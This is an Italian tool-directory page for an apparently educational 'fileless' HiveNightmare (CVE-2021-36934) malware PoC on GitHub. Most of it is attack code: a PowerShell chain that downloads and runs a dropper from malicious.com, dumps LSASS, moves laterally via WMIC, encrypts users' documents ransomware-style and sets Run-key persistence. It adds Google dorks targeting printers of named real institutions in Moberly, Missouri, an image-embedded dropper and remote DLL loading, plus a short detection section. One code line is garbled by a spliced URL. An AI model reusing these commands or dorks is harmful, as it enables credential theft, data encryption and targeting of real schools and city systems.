Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Why-so-Serious-SAM — Malware PoC che sfrutta la vulnerabilità CVE-2021-36934 (ACL improprie sulle copie shadow) utilizzando un metodo red team fileless su Windows 10/11 con LOLBins, estraendo i hive SYSTEM e SAM per gli hash NTLM locali. | Kitploit
Strumenti/GitHubGitHub/p1rat3r00t/why-so-serious-sam
Escalation di PrivilegiExploitMovimento LateralePost-ExploitCTFPenetration TestingApprendimento e FormazioneRed TeamingLab e Pratica
GitHubp1rat3r00t/why-so-serious-sam

Why-so-Serious-SAM

Malware PoC che sfrutta la vulnerabilità CVE-2021-36934 (ACL improprie sulle copie shadow) utilizzando un metodo red team fileless su Windows 10/11 con LOLBins, estraendo i hive SYSTEM e SAM per gli hash NTLM locali.

11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi RepositorySito web

HiveNightmare 'Fileless' Exploit PoC:

Screenshot 2025-05-21 001453


Indice

  • Panoramica
  • Caratteristiche
  • Esempio di simulazione in laboratorio
  • Ricognizione con Google Dorks
  • Panoramica sui LOLBins
  • Incorporazione di dropper fileless
  • Sfruttamento di Print Spooler e HiveNightmare
  • Iniezione di DLL riflessiva
  • Mappatura MITRE ATT&CK
  • Rilevamento e mitigazione
  • Disclaimer legale
  • Riferimenti e approfondimenti

Panoramica

CVE-2021-36934/HiveNightmare è un progetto di ricerca educativo per red/purple team che simula un framework di attacco malware fileless su Windows 11. Consente l'emulazione di kill chain avversarie reali utilizzando le tecniche di MITRE ATT&CK, con particolare attenzione a operazioni stealth e fileless.

Avvertenza: Solo per ricerca e formazione in laboratori isolati. Non utilizzare su sistemi di produzione o non autorizzati.


Caratteristiche

  • Simula attacchi ransomware/wiperware fileless end-to-end
  • Dimostra l'uso dei Living Off the Land Binaries (LOLBins)
  • Mostra accesso alle credenziali, escalation dei privilegi, movimento laterale e persistenza
  • Contiene esempi pratici di laboratorio e di ricognizione
  • Si mappa su MITRE ATT&CK per esercitazioni di rilevamento blue team

Esempio di simulazione in laboratorio

La seguente simulazione PowerShell dimostra una tipica catena di attacco ransomware fileless utilizzando strumenti Windows integrati (LOLBins):

root@kitploit:~
# Initial Access: Load dropper
IEX(New-Object Net.WebClient).DownloadString("http://malicious.com/dropper.ps1")

# Execution: Decode and load in-memory payload
$bytes = [System.Convert]::FromBase64String("[Base64Payload]") 
[System.Reflection.Assembly]:https://raw.githubusercontent.com/p1rat3r00t/why-so-serious-sam/HEAD/:Load($bytes)

# Privilege Escalation
Start-Process powershell -Args "-ExecutionPolicy Bypass -File C:\Temp\elevate.ps1" -Verb RunAs

# Credential Access
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Temp\lsass.dmp full

# Lateral Movement
wmic /node:targetPC process call create "powershell.exe -File \\share\payload.ps1"

# File Encryption Example
$files = Get-ChildItem -Path "C:\Users\*\Documents" -Include *.docx,*.pdf -Recurse
foreach ($file in $files) {
  $data = Get-Content $file.FullName -Raw
  $aes = New-Object System.Security.Cryptography.AesManaged
  $aes.Key = [Text.Encoding]::UTF8.GetBytes("RANDOM-GEN-KEY-1234567890123456")
  $aes.IV = New-Object byte[] 16
  $enc = $aes.CreateEncryptor().TransformFinalBlock([Text.Encoding]::UTF8.GetBytes($data), 0, $data.Length)
  Set-Content -Path $file.FullName -Value ([Convert]::ToBase64String($enc))
}

# Persistence
Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "ransomware" -Value "powershell -File C:\Temp\persist.ps1"

Ricognizione con Google Dorks

Obiettivo di esempio: Identificare servizi di stampa esposti pubblicamente a Moberly, Missouri, potenzialmente vulnerabili a exploit come PrintNightmare.

Query Google Dork di esempio:

root@kitploit:~
inurl:"/hp/device/this.LCDispatcher" "Moberly"
intitle:"Printer Status" "Moberly Public Schools"
intitle:"Web Image Monitor" inurl:"/wim" "Moberly"
inurl:"/printer/main.html" "City of Moberly"
intitle:"Web Jetadmin" "Moberly"
inurl:"/printers/" "Moberly"
inurl:"/PPS/public/" "Moberly"
intitle:"Konica Minolta" inurl:"/wcd/" "Moberly"
intitle:"PaperCut MF" "Moberly"
intitle:"Lexmark" inurl:"/printer/" "Moberly"
intitle:"Canon Remote UI" "Moberly"
intitle:"EpsonNet Config" "Moberly"

Panoramica sui LOLBins

I Living Off the Land Binaries (LOLBins) sono binari Windows legittimi e fidati, spesso abusati dagli avversari per bypassare i controlli di sicurezza ed eseguire codice malevolo senza lasciare file sul disco.

Esempio di utilizzo (attacco al servizio di stampa):

root@kitploit:~
rundll32.exe \\10.10.X.X\shared\payload.dll,ReflectEntry

Gli aggressori utilizzano LOLBins come rundll32.exe, regsvr32.exe e powershell.exe per eseguire payload da condivisioni di rete, spesso dopo aver identificato stampanti o server esposti tramite ricognizione.


Incorporazione di dropper fileless

Obiettivo: Consegnare payload in modo occulto incorporando archivi nelle immagini ed estraendoli con strumenti nativi.

Passaggi:

  1. Incorporare il payload:

    root@kitploit:~
    copy /b nsfw.jpg + payload.7z nsfw.jpg
    
  2. Estrarre e decodificare:

    root@kitploit:~
    certutil -decode nsfw.jpg dropper.7z
    7z x dropper.7z -oC:\Users\Public\
    

Questo metodo bypassa il tradizionale filtraggio delle estensioni file e sfrutta strumenti integrati per una consegna elusiva.


Iniezione di DLL riflessiva

Tecnica: Caricare ed eseguire una DLL malevola direttamente in memoria tramite caricamento riflessivo.

Esempio:

root@kitploit:~
rundll32.exe \\10.10.X.X\share\nsfw.dll,ReflectEntry

Ciò consente un'esecuzione stealth in memoria, senza lasciare artefatti sul disco.


Mappatura MITRE ATT&CK


Rilevamento e mitigazione

Rilevamento

  • Regole Sysmon + Sigma:

    • Monitorare rundll32.exe che carica DLL non di sistema
    • Controllare l'uso anomalo di certutil.exe, regsvr32.exe, mshta.exe
    • Tracciare l'accesso ai volumi shadow da parte di non amministratori
  • Esempi SIEM (ELK/Splunk):

    • Avvisi sull'esecuzione da condivisioni pubbliche
    • Anomalie nei processi padre/figlio (es. explorer.exe che genera rundll32.exe)
    • Comandi codificati sospetti in PowerShell o CMD

Mitigazione

  • Disabilitare Print Spooler dove non necessario:
    root@kitploit:~
    Stop-Service -Name Spooler -Force
    Set-Service -Name Spooler -StartupType Disabled
    
  • Applicare tutte le patch di sicurezza e indurire gli ACL
  • Bloccare o limitare i LOLBins con AppLocker o WDAC
  • Utilizzare soluzioni EDR in grado di rilevare il caricamento riflessivo di DLL e gli attacchi in memoria

Disclaimer legale

Tutti i contenuti, i codici e le tecniche in questo repository sono solo a scopo educativo e per test di penetrazione autorizzati. Non utilizzare alcuna parte di questo progetto al di fuori di ambienti controllati e isolati e senza esplicita autorizzazione. Gli autori non si assumono alcuna responsabilità per un uso improprio.


Riferimenti e approfondimenti

  • LOLOL Farm – Parco giochi LOLBin
  • LOLGEN – Genera catene LOLBin
  • Rilevare SeriousSam
  • Guida all'iniezione di DLL
  • Catena di exploit di Print Spooler
  • Malware fileless – Wikipedia
  • PrintSpoofer (originale)
  • HiveNightmare
  • Mitre Attck T1055
  • Demo di HiveNightmare

Rimanete al sicuro, fate ricerca in modo responsabile e utilizzate sempre tutto in maniera legale ed etica.

Scarica lo strumento
FaseTecnicaIDDescrizione
Accesso inizialeAccount validi / Compromissione drive-byT1078, T1189Compromissione delle interfacce di stampa esposte al pubblico
EsecuzioneDLL Side-Loading / LOLBinsT1218, T1055.001Esecuzione riflessiva di DLL tramite binari fidati
Escalation dei privilegiExploit di Print Spooler / Abuso degli ACL di HiveT1068, T1003.002Accesso a livello SYSTEM ed estrazione degli hash SAM
Evasione delle difeseEsecuzione fileless / File offuscatiT1027, T1202Payload codificati consegnati tramite certutil, mshta, ecc.
Accesso alle credenzialiDump LSASS / Accesso all'hive SAMT1003Dump delle credenziali dopo HiveNightmare
Movimento lateraleEnumerazione delle condivisioni SMB/NetT1021.002Diffusione tramite condivisioni di stampa o enumerazione dello spooler
ImpattoDistruzione dei dati / CrittografiaT1485, T1486Wiperware fileless attivato tramite payload DLL